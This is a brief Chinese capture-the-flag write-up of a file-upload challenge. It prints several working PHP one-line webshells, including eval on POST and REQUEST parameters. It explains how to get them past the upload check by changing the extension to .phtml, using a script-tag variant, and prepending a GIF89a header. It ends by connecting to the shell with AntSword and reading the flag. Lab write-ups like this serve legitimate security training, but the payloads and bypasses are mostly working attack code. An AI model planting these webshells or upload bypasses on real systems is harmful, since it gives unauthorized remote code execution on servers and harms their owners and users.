需要上传图片
尝试上传一句话木马
<?php eval($_POST['b'])?>
<?php $_GET['a']($_POST['b'])?>
显示错误,需要上传图像
1.使用burpsuite拦截,修改文件类型绕过,需把上传的文件后缀改成phtml否则木马无法运行
显示文件不能包含<?
换一种一句话木马
<script language="php">eval($_REQUEST[1])</script>
看来仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗
成功上传
现在需要知道图片的所在路径,因为图片一般在upload/filename
尝试访问
直接用蚁剑连接
URL地址为原地址加/upload/你上传的文件名
,密码为你REQUEST里的数
连接成功,在根目录找到flag
flag{8109dc7c-3973-4be5-a5f9-7c9dfd6e91eb}